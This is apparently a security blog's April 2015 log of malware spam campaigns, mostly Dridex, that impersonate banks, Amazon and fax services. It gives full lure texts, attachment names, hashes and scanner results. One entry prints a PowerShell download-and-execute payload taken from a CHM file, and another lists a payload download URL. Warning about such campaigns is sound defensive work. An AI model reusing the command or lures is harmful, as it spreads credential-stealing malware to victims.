Amazon

Thursday, 30 April 2015

Telephone order form Rebecca McDonnell TELEPHONE PURCHASE ORDER FORM.doc

Telephone order form Rebecca McDonnell TELEPHONE PURCHASE ORDER FORM.doc macro malware.

These emails aren't from these companies at all , they are just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Headers:
From: "Rebecca McDonnell" {rebecca@gascylindersuk.co.uk}
Subject: Telephone order form
Message Body:
Telephone order form attached
Regards,

Rebecca McDonnell
Business Administrator

340a Haydock Lane, Haydock Industrial Estate,
St Helens, Merseyside, WA11 9UY
DDI:  01744 304338
Fax: 01942 275 312
Email: rebecca@gascylindersuk.co.uk

 Attachment:
 TELEPHONE PURCHASE ORDER FORM.doc
Sha256 Hashes:
61592d8a2e3ca60aa1552089e485065f0dc753b61e290b5e4645e8aacd4eb50d [1]
61e3abb5d497234f678cf176aee4b9876ace95246241f96c97186a13fc9df2d0 [2]
10e55770ea40c6910f5cf484438a30874c3a994d7df65cbe8a1c1460efb34e8c [3]
3ff341262900d33574bab920f9d7f15a21db3f6c4a931e17dbaabd09d3c5fd71 [4]
d51e3483c9fa8db6cf9eabaae1c2598ecaa9c2ff05226f0c08178b3f1694eb14 [5]
Malware Virus Scanner Reports:
VirusTotal Report: [1] (Detection: 4/79)
VirusTotal Report: [2] (Detection: 4/79)
VirusTotal Report: [3] (Detection: 4/79)
VirusTotal Report: [4] (Detection: 4/79)
VirusTotal Report: [5] (Detection: 4/79)


NOTE

The current round of Word/Excel/XML attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Wednesday, 29 April 2015

New credit terms from HSBC malware zip attached

New credit terms from HSBC with a malware zip attached...

Headers:
Subject: New credit terms from HSBC
Message body:
Sir/Madam,

We are pleased to inform you that our bank is ready to offer you a bank loan.
We would like to ask you to open the Attachment to this letter and read the terms.

Yours faithfully,
Global Payments and Cash Management
HSBC
Attached to the message is a Zip file:
{random}.zip
Inside the Zip file is a Windows Executable file:
 Payment.exe
Sha256 Hashes:
 f9b1166abf531e9b8b8c2002cc76efa935667379b6555391d5868b37359b1502 [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 1/57)
Malwr Report: [1]
Hybrid Analysis Report: [1]

Cheers,
Steve
Sanesecurity.com

Tuesday, 28 April 2015

Subject: You have received a Secure Message JPMorgan Chase and Co

Subject: You have received a Secure Message JPMorgan Chase and Co malware

These emails aren't from these companies at all , they are just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Headers:
From: "JPMorgan Chase and Co." {service@jpmorgan.com}
Subject: You have received a Secure Message
Message Body:
You have received a secure message
To read your Secure Message please click here. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
First time users - will need to register after opening the attachment.
About Email Encryption please check our website at https://jpmorgan.com

Link in the email is to download a file from sugarsync.com:
https://www.sugarsync DOT com/pf/D1697914_039_865508423?directDownload=true

The downloaded file is: (do not open)
SecureMessage.chm

Sha256 Hashes:
ec00a81a94c12afd385955396e5d7dbc25bd9608640a78857176c38e051566f8 [1]
Malware Virus Scanner Reports:
VirusTotal Report: [1] (Detection: 1/79)

NOTE

The current round of Word/Excel/XML/CHM attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Incident IM / NatWest Secure Message / JP Morgan Access Secure Message

Incident IM / NatWest Secure Message / JP Morgan Access Secure Message SecureMessage.chm  malware.


These emails aren't from these companies at all , they are just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Headers:
From: "Hilda Tyler" {Hilda.Tyler@rbs.co.uk}
Subject: RE: Incident IM03116081

From: "NatWest.co.uk" {secure.message@natwest.com}
Subject: NatWest Secure Message
Message Body:
Good Afternoon ,

Attached are more details regarding your account incident.

Please extract the attached content and check the details.

Please be advised we have raised this as a high priority incident and will endeavour to resolve it as soon as possible. The incident reference for this is IM03116081.

We would let you know once this issue has been resolved, but with any further questions or issues, please let me know.

Kind Regards,

Hilda Tyler

Level 2 Adviser | Customer Experience Team, IB Service & Operations 7th Floor, 1
Hardman Boulevard | Manchester | M3 3AQ | Depot code: 049
Tel: 0845 300 4108 |Email: Hilda.Tyler@bankline.rbs.co.uk The content of this e-mail is CONFIDENTIAL unless stated otherwise

 Attachment:
SecureMessage.chm
Sha256 Hashes:
467f6d76802014ab671fa868b9b81b79497889f906c434620742e391aee17670 [1]
Malware Virus Scanner Reports:
VirusTotal Report: [1] (Detection: 1/79)

Malwr Report: [1]

Hybrid Analysis Report: [1]

Payload (html file inside chm document):

,cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('http://selkirkconed.com/wp-content/uploads/2014/06/Lh1n1 DOT exe','%TEMP%\natmasla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla2 DOT exe')">

VirusTotal Report: [2]

NOTE

The current round of Word/Excel/XML attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

INVOICE PD Will Comm Richard Will Orion_PD_INV_12138.doc

INVOICE PD Will Comm Richard Will with an attached Orion_PD_INV_12138.doc macro malware.


These emails aren't from these companies at all , they are just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Headers:
From: richard will {contactwill@hotmail.com}
Subject: INVOICE PD Will Comm
Message Body:
Thank-you for your payment!

Richard Will

Will Communications=2C Inc.
richard@willcommunications.com

 Attachment:
Orion_PD_INV_12138.doc
Sha256 Hashes:
8e199062f5eeea52bdbe7a70895b83fe1af09a4f654bb42ba63be4b71115187b [1]
e0eec3c980f9ee96d805caf9a02122ada26c4ec78575527053e0939f672722b7 [2]
Malware Virus Scanner Reports:
VirusTotal Report: [1] (Detection: 4/79)
VirusTotal Report: [2] (Detection: 4/79)

Malwr Report: [1]
Malwr Report: [2]

Hybrid Analysis Report: [1]
Hybrid Analysis Report: [2]

NOTE

The current round of Word/Excel/XML attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Monday, 27 April 2015

Scanned Image from a Xerox WorkCentre

Xerox WorkCentre Scanned Image from a Xerox WorkCentre with a malware zip attached...

Headers:
From: "Xerox WorkCentre" {Xerox.994@
Subject: Scanned Image from a Xerox WorkCentre
Message body:
Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.

Sent by: newburydata.co.uk
Number of Images: 9
Attachment File Type: ZIP [PDF]
File Name: Scan001_4052168_041.zip

WorkCentre Pro Location: Machine location not set
Device Name: newburydata.co.uk

Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: http://www.adobe.com/

Attached to the message is a Zip file:
Scan001_4052168_041.zip
Inside the Zip file is a Windows Executable file:
Scan001_812901_041.exe
Sha256 Hashes:
f5ce6a2eff32a2cac6979d9ad996b10148d2430f10438ed8b8f6a6132f41e9c8 [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 3/57)

Cheers,
Steve
Sanesecurity.com

HI Rob Robichaud Hub City Auto Paints and Supplies Ltd.

HI Rob Robichaud Hub City Auto Paints and Supplies Ltd. with a malware zip attached...

Headers:
From: {random}
Subject: HI{email address}
Message body:
Hello! Can you please check the Attachment that I have sent? I need your help.

Thanks
Rob Robichaud
Hub City Auto Paints and Supplies Ltd.
A Division of Autochoice Parts & Paints
CSR
153 Loftus St
Moncton, NB
E1E 2N3
Ph: 506-857-8394 ext 115
Cell:  506-381-1123
Fx:  506-858-7893
e-mail:  rob.robichaud@hubcityautopaints.com
web:  www.hubcityautopaints.com
Attached to the message is a Zip file:
kris- #70533363.zip
Inside the Zip file is a Windows Executable file:
Lmiya.exe
LOG.exe
Reports.exe
Sha256 Hashes:
e7537927352f7598a9afb64ea6bfb4e59936c8bda698720fdc69b290dd9b2241 [1]
4bb405eb9dfe78bf231ef696d6d3a1a87861f53245e0a22b182cb73133a9846e [2]
7b503b38f94671dea8f05aa56ed9b630cbfe1e1ec5a892fc7d2176a3d004dfbb [3]
Anti virus reports:
VirusTotal Report: [1] (Detection 2/57)
VirusTotal Report: [2] (Detection 2/57)
VirusTotal Report: [3] (Detection 2/57)

Cheers,
Steve
Sanesecurity.com

[1138593] Booking.com Invoice 01/03/2015 - 31/03/2015 invoice@booking.com

[1138593] Booking.com Invoice 01/03/2015 - 31/03/2015  invoice@booking.com macro malware


These emails aren't from these companies at all , they are just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Headers:
From: invoice@booking.com
Subject: [1138593] Booking.com Invoice 01/03/2015 - 31/03/2015
Message Body:
Dear customer,

Herewith you receive the electronic invoice regarding the commissions for the period from 01/03/2015 to 31/03/2015.

If you have any questions, please contact our Credit Control Department at telephone number
+44 (0)208 612 8210 (e-mail:  ).

Thank you for working with Booking.com.


 Attachment:
invoice-1501383360.doc
Sha256 Hashes:
854707acab9c84d12b822a4849ea298e2b2cc7f3d600533b7c13ce9a7c41709e [1]
Malware Virus Scanner Reports:
VirusTotal Report: [1] (Detection: 3/79)
Malwr Report: [1]
Hybrid Analysis Report: [1]

NOTE

The current round of Word/Excel/XML attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Friday, 24 April 2015

invoice for car repairs Gruss, Claus Felgen-Garage

invoice for car repairs Gruss, Claus Felgen-Garage with a malware zip attached...

Headers:
From: creative {creative@cix.co.uk}
Subject: invoice for car #35320918
Message body:
hi,
The invoice for car repairs.




Gruss, Claus
__________________________________________

Felgen-Garage
Claus Leykauf
Galgengasse 14
91257 Pegnitz
Germany

tel.: +49 (0) 9241 724785
fax: +49 (0) 9241 724786
mobile: +49 (0) 172 8801123

www.Felgen-Garage.de
Attached to the message is a Zip file:
creative #18994679.zip
Inside the Zip file is a Windows Executable file:
car-repairs.exe
car.exe
kitta234234.exe
Sha256 Hashes:
05a83313d5b30752fc4ba47529700b9b6c50b7ca65d34ca951d73a0b790b1dab [1]
1e4189d58ca73a02d724bbeb093944eda2d4191e3985a574f26c48c9766b418b [2]
80c204ed25055969a14c0af2565c3f5c31ce8421bb5a36014cffb05d07b905ec [3]
Anti virus reports:
VirusTotal Report: [1] (Detection 0/57)
VirusTotal Report: [2] (Detection 0/57)
VirusTotal Report: [3] (Detection 0/57)

Cheers,
Steve
Sanesecurity.com

Fax inc FAX Fax message

Fax inc FAX Fax message with a malware zip attached...

Headers:
From: "Fax inc" {joyless3@networkadvertising.org}
Subject: FAX #259290
Message body:
Fax message
Sent date: Fri, 24 Apr 2015 17:02:04 +070
Attached to the message is a Zip file:
Fax_83478923748923748923748927389423423423.zip
Inside the Zip file is a Windows Executable file:
Fax_83478923748923748923748927389423423423.exe
Sha256 Hashes:
de70dd9d3c7b992cef1dcf04ca55dbc5945993f2eedc6f72b403724e0af3d96e     [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 1/57)
Malwr Report: [1]
Hybrid Analysis Report: [1]

Cheers,
Steve
Sanesecurity.com

Pidwell, Nigel Western Order ssecontracting.com

Pidwell, Nigel Western Order.doc {nigel.pidwell@ssecontracting.com} SSE Contracting Limited word document malware


These emails aren't from these companies at all , they are just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Headers:
From: "Pidwell, Nigel" {nigel.pidwell@ssecontracting.com}
Subject: Western Order
Message Body:
Regards
Nigel Pidwell
Administrator
SSE Contracting Limited
T: +44 (0) 1637 889506
E: nigel.pidwell@ssecontracting.com
Unit 8, Hurling Way,
St Columb Major Business Park, St Columb Major, Cornwall
TR9 6SX

 Attachment:
Western Order.doc
Sha256 Hashes:
d2a4c536d271fb9a636c0e820787e428994cf58fe8cac988ef190fc94889a994 [1]
e6dfcf8ca155e5d2fc448288daaaf4ca3575024b0128ecaa4f25043521427190 [2]
2c55b64baa85108c98587e3a3e32afc8546d325f279ae6fe203b7b3c43813329 [3]
4da15671a7452be169c073ed5d4097729d29f691dbce217a869cb88adfe5d75a [4]
8408760abb536defdc4800e6414340e1910860127d1b3e16119d9dfdcb2ae82f [5]
Malware Virus Scanner Reports:
VirusTotal Report: [1] (Detection 2/57)
VirusTotal Report: [2] (Detection 2/57)
VirusTotal Report: [3] (Detection 2/57)
VirusTotal Report: [4] (Detection 2/57)
VirusTotal Report: [5] (Detection 2/57)

Payload Information (Credit to: Artifice)
h t t p ://natalievoit.com/83/61 DOT exe [6]
VirusTotal Report: [6]

NOTE

The current round of Word/Excel/XML attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Colin Fox Invoice 519658 Sales Invoice 519658.pdf malware

Colin Fox Invoice 519658 Sales Invoice 519658.pdf colin@nofss.co.uk malware


These emails aren't from these companies at all , they are just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Headers:
From: Colin Fox {colin@nofss.co.uk}
Subject: Invoice 519658
Message Body:
Please find Invoice 519658     attached

 Attachment:
Sales Invoice 519658.pdf
Sha256 Hashes:
3de96921a07553cf5ef25cab246480f04383d44cc921042e1462b7ffbe1fe720 [1]
7ae59f17744bf995747a5c23a1e7fe3710cbe79c2554ffd935053739c67aa88f [2]
5b7d4e88f901f5a7519b3f3ecaf8594d7366fec6f3b4acaf51a1a5175996b4d9 [3]
Malware Virus Scanner Reports:
VirusTotal Report: [1] (Detection 2/57)
VirusTotal Report: [2] (Detection 2/57)
VirusTotal Report: [3] (Detection 2/57)

Malwr Report: [1]
Malwr Report: [2]
Malwr Report: [3]

Hybrid Analysis Report: [1]
Hybrid Analysis Report: [2]
Hybrid Analysis Report: [3]

Notes:

Being detected with Sanesecurity signatures as:
Sanesecurity.Malware.24852.MacroHeurGen.GnIo.UNOFFICIAL FOUND

Pdf contains JavaScript to launch:


Ppdf drops a word document containing macros, so DO NOT SAVE
OR OPEN THIS FILE:



NOTE

The current round of Word/Excel/XML attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Thursday, 23 April 2015

You have a new eFax from 639-469-3635

You have a new eFax from 639-469-3635 emails arriving with a clickable malware link.

Headers:
From: "eFax.com" {no_reply@inbound.efax.com}
Subject: You have a new eFax from 639-469-3635 - 1 pages
Message body:

eFax Message [Caller-ID: 639-469-3635]
You have received a 3 pages fax on Thu, 23 Apr 2015 14:52:54 +0100 .
You can view your eFax online, in PDF format, by visiting :

https://www2.efax.com/documents/view_fax.aspx?utm_source=eFax&fax_type=doc&caller_id=639-469-3635

* This fax's reference # is 18389822

Thank you for using eFax!
The fake link in the message body takes you to download:
http://91.194.254.239/fax_33663232.pdf.zip
Inside the Zip file is a Windows Executable file:
df_fax_33663232.pif
Sha256 Hashes:
05bd60347ac7df715a2a8ca36fba996392424879804c552a2aef1d31d019147e    [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 3/57)
Malwr Report: [1]
Hybrid Analysis Report: [1]

Cheers,
Steve
Sanesecurity.com

olivia Annual report olivia@cdc.co.uk CDC Consulting

olivia Annual report olivia@cdc.co.uk CDC Consulting email with an attached malware
Annual report.zip






Headers:
From: olivia {olivia@cdc.co.uk}
Subject: Annual report
Message body:
Hi,
Annual report sent to you, maybe yours.

CDC Consulting
Algyr le parc
119 BL de la Bataille de Stalingrad
69100 Villeurbanne
The attached Zip is called:
Annual report.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)
Luk22.exe
Sha256 Hashes:
82d8e65a75e3d955d2fd850f4a7a17b31a4dc74660f664d15f1af42e7b3c2a3a     [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 4/57)
Malwr Report: [1]
Hybrid Analysis Report: [1]

Cheers,
Steve
Sanesecurity.com

Refund on order 204-2374256-3787503 Amazon

Refund on order 204-2374256-3787503 Amazon with an attached 204-2374256-3787503-credit-note.doc word document containing a macro.

These emails aren't from these companies at all , they are just being used to make the email look more genuine, ie. from a real company.
Note
It's also worth remembering that the company itself  may not have any knowledge of this email and it's link(s) or attachment as it won't have come from their servers and IT systems but from an external bot net.

It's not advised to ring them as there won't really be anything they can do to help you.

Headers:
From: "Amazon.co.uk" {payments-messages@amazon.co.uk}
Subject: Refund on order 204-2374256-3787503
Message Body:
Dear Customer,

Greetings from Amazon.co.uk.

We are writing to confirm that we are processing your refund in the amount of £4.89 for your
Order 204-2374256-3787503.

This amount has been credited to your payment method and will appear when your bank has processed it.

This refund is for the following item(s):

Item: Beautiful Bitch
Quantity: 1
ASIN: 1476754144
Reason for refund: Customer return

The following is the breakdown of your refund for this item:

Item Refund: £4.89

Your refund is being credited as follows:

GC: £4.89

These amounts will be returned to your payment methods within 5 business days.

The amount credited to your Gift Card balance should be automatically applied to your next eligible
order on our website.

Have an issue with your refund, or a question about our refund policy?
Visit our Help section for more information:

http://www.amazon.co.uk/gp/help/customer/display.html?nodeId=1161010

Please note: The credit note for this transaction is attached to this e-mail and to open, you will
need Adobe Reader. If you do not have an Adobe Reader, please visit the following link to download
it: http://get.adobe.com/reader/

This credit note is the detailed breakdown of the refund showing the item(s), delivery costs and
associated VAT for each item. This credit note is largely applicable to business customers who
should retain it for accounting purposes. It’s not possible to redeem or use the credit
note number from this credit note towards an order. Visit our Help pages for more information on
refunds.

Thank you for shopping at Amazon.co.uk.

Sincerely,

Amazon.co.uk Customer Service
http://www.amazon.co.uk


Note: this e-mail was sent from a notification-only e-mail address that cannot accept incoming e-mail.
Please do not reply to this message.

An advanced electronic signature has been attached to this electronic credit note. To add the certificate
as a trusted certificate, please follow these instructions:
1. Click on the 'Signature Panel' in the upper right corner
2. Expand the drop-down in the newly opened Signatures menu, expand the 'Signature Details' drop-down and
   click 'Certificate Details'
3. In the Certificate Viewer box click on the 'Trust' tab, click 'Add To Trusted Certificates' and then
   click OK
4. In the Import Contact Settings box, ensure that 'Use this certificate as a trusted root' is selected,
   click OK, and then click OK again


 Attachment:
204-2374256-3787503-credit-note.doc
Sha256 Hashes:
afc3885ee8a0dbedde13bf205a263b5a6035966c5ebffaf0f8cd4cab60ae7628 [1]
71afeadea256a9e4661f6d8e53e0f80888961ecbed989c54950ad54bab114d4c [2]
ce15debd4312acf2f6546c1bab4287cd410ed82e021f55d051634e6a416ad11a [3]
33ba98b1426bb1e1c0975ec640f0f4a9262a38de4d0e00aadfc903a3e8411161 [4]
314ed382b9497b4fd7c9854c7fb3f31ed5bd0153bad8a114f0284e19d1f4b4e7 [5]
435c2f935685633870c4831e43118d305ba3de074ba67584cf1c9d49595f7821 [6]
Malware Virus Scanner Reports:
VirusTotal Report: [1] (Detection 4/57)
VirusTotal Report: [2] (Detection 4/57)
VirusTotal Report: [3] (Detection 4/57)
VirusTotal Report: [4] (Detection 4/57)
VirusTotal Report: [5] (Detection 4/57)
VirusTotal Report: [6] (Detection 4/57)


NOTE

The current round of Word/Excel/XML attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to

steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,
Steve

Wednesday, 22 April 2015

Barclays - Important Update, read carefully!

Barclays - Important Update, read carefully! email with a malware Zip attached...

Headers:
From: "Barclays Online Bank" {security-update@Barclays.co.uk}
Subject: Barclays - Important Update, read carefully!
Message body:
Dear Customer,

Protecting the privacy of your online banking access and personal information are our primary concern.

During the last complains because of online fraud we were forced to upgrade our security measures.

We believe that Invention of security measures is the best way to beat online fraud.

Barclays Bank have employed some industrial leading models to start performing an extra security check with Your Online Banking Activities to ensure a safe and secure Online and Mobile Banking.

For security reasons we attached the Update Form to this e-mail.

You are requested to follow the provided steps and Update Your Online Banking details, for the safety of Your Accounts.

- Please download and complete the form with the requested details.
- Fill in all required fields with your accurately details (otherwise will lead to service suspension)

Warning: If you choose to ignore our request, you leave us no choice but to temporary hold on your funds.

Thank you for your patience as we work together to protect your account.

Please update your records on or before 48 hours, a failure to update your records will result in a temporary hold on your funds.

Sincerely,

Barclays Online Bank Customer Service

We apologize for any inconvenience this may have caused.

(c) Copyright 2015 Barclays Bank Plc. All rights reserved.

 The Zip is called:
Form.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)
Form.exe
Sha256 Hashes:
380105cfefa8ec7a924ac6796abf1e9543e78eefb75fbfaa06157299fc1ef1fa   [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 4/56)
Malwr Report: [1]
Hybrid Analysis Report: [1]

Cheers,
Steve
Sanesecurity.com

Bankline ROI - Password Re-activation Form

Bankline ROI - Password Re-activation Form email with a malware Zip attached...

Headers:
From: "Concepcion Lilly" {Concepcion.Lilly@rbs.co.uk}
Subject: Bankline ROI - Password Re-activation Form
Message body:
Please find the Re-activation form attached, send one per user ensuring only one box is selected in section 3.  A signatory on the bank mandate must sign the form.

Fax to 1850 005731 or alternatively you may wish to email the completed document, by attaching it to an email and sending it to banklineadministration@rbs.co.uk

On receipt of the completed form we will respond to the request within 2 working hours and communicate this to the user by email.

<> 

Please note - The life-span of an activation code is 21 days; after this time, the activation code will expire and a new one must be ordered.  

Please be aware when choosing a new pin and password for the service, it is important not to use pin/passwords that you have used before but to use completely different details.

If you are the sole Standard Administrator may I take this opportunity to suggest when you are reinstated on the system, to set up another User in a Standard Administrator role. This will prevent you being locked out completely and allow you to order a new activation code from within the system and reset your security sooner.

If you require any further assistance then please do not hesitate to contact us on 1850 189790 and one of our associates will be happy to assist you.

Regards
Bankline Product Support
 The Zip is called:
Bankline_Password_reset_0149858.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)
Bankline_Password_reset_AQ004PR7.exe
Sha256 Hashes:
380105cfefa8ec7a924ac6796abf1e9543e78eefb75fbfaa06157299fc1ef1fa   [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 4/56)
Malwr Report: [1]
Hybrid Analysis Report: [1]

Cheers,
Steve
Sanesecurity.com

HSBC Advising Service Payment Advice - Advice Ref CHAPS credits

HSBC Advising Service  Payment Advice - Advice Ref CHAPS credits email...

Headers:
From: "HSBC Advising Service" 
Subject: Payment Advice - Advice Ref:[GB078486] / CHAPS credits
Message body:
Sir/Madam,

Please download document from server, payment advice is issued at the 
request of our customer. The advice is for your reference only.

Download link:

http://futbolyresultados.es/HSBC_STORAGE-DATA/secure.payment.html

Yours faithfully,
Global Payments and Cash Management
HSBC
The link in the message body, when clicked auto-downloads from this site:
http://futbolyresultados.es/HSBC_STORAGE-DATA/secure.payment.html
The above site, auto-downloads from:
ttps://fetch.hightail.com/storage-agent/a0/files/21b1da0b-91fb-4cd2-85f9-089a0866d73f/new_payment_document.zip?download_id=5076442704&file=new_payment_document.zip
The Zip is called:
new_payment_document.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)
new_payment_document.exe
Sha256 Hashes:
 acf7af8a197ecbcc1a2ee24a359d7b6ead91223d3988b490e8c8c6896b001b4f    [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 2/56)
Malwr Report: [1]
Hybrid Analysis Report: [1]

Cheers,
Steve
Sanesecurity.com

Voipfone Voicemail New voice message in mailbox

Voipfone Voicemail New voice message in mailbox email with malware zip attachment.

Headers:
From: Voipfone Voicemail {voicemail@voipfone.co.uk}
Subject: New voice message in mailbox
Message body:
You have a new voice mail message in mailbox from 08447702345 on Wednesday, April 21, 2015 at 03:52:49 AM.

To listen to the message click on the sound file attached.

Please delete messages once received or store them locally as they will be removed from our system from time to time.

You currently have 67 new messages and 4 old messages.


If you need assistance please contact support@voipfone.co.uk

Kind Regards,

Voipfone Voicemail System

Attached to the email is a Zip file:
WAV0004291.wav.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)
WAV0004291.wav.exe
Sha256 Hashes:
 0a760819fcd40ea9e3a42a651c201c314e7a0ecfacc611341fe3a2c9192a7683   [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 2/56)
Malwr Report: [1]
Hybrid Analysis Report: [1]

Cheers,
Steve
Sanesecurity.com

Tuesday, 21 April 2015

Subject: new my info emails Bicicletes Nadal Oliver

Subject: new my info  Bicicletes Nadal Oliver emails...

Headers:
Subject: new my info
Message body:
Hello! I have found some interesting information that you might need!
Check out the attached file!

Bicicletes Nadal Oliver, S.L.
Passeig Ferrocarril, 61
07500 Manacor (Mallorca)
Illes Balears
Tel.971-843358
Web: www.bicicletesnadal.com

Attached to the email is a Zip file:
lh3i1for7an1t7k.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)
Lemon.exe
Sha256 Hashes:
 bb37ddbf6c4e7bf961b6e0968370633e3b89391455d0b8da389bb1a20e77aa48  [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 3/56)
Malwr Report: [1]

Cheers,
Steve
Sanesecurity.com

New Fax - "UK2Fax" {fax2@fax1.uk2fax.co.uk}

Important - Internal ONLY Administrator emails...

Headers:
Subject: New Fax - {random}
From: "UK2Fax" {fax2@fax1.uk2fax.co.uk}

Subject: New Fax - 02724381)
Subject: New Fax - 0800 200 400)
Subject: New Fax - 0845 3000 000)
Subject: New Fax - 08457 404 404)
Subject: New Fax - 08457 555 555)
Subject: New Fax - 3901535011)
Subject: New Fax - 800031031)
Subject: New Fax - 800050606)
Subject: New Fax - 800273336)
Subject: New Fax - 800312316)
Subject: New Fax - 800575757)
Subject: New Fax - 800837455)
Message body:
UK2Fax Fax2Email : New fax attached, received at 21/04/2015 10:21:29 GMT
Attached to the email is a Zip file:
FAX_117_849721.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)
FAX_117_849721.exe
Sha256 Hashes:
71ff5e3c9e74f6cad1d405b2172a76527396b05fa7767cf85be58da06c68fd28  [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 3/56)
Malwr Report: [1]

Cheers,
Steve
Sanesecurity.com

You win green card USA Green

Important - Internal ONLY Administrator emails...

Headers:
From: "USA Green" {casalsj466@networkadvertising.org}
Subject: You win green card
Message body:
Your requested report is attached here. USA.
Attached to the email is a Zip file:
green_card_32328472389749823748923749823794823.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)
green_card_32328472389749823748923749823794823.exe
Sha256 Hashes:
389502ac16c75ec71372937f87d959d0159db2c0b6b5d243071ca0e4fa0ebeaa  [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 3/56)
Malwr Report: [1]

Cheers,
Steve
Sanesecurity.com

Important - Internal ONLY Administrator

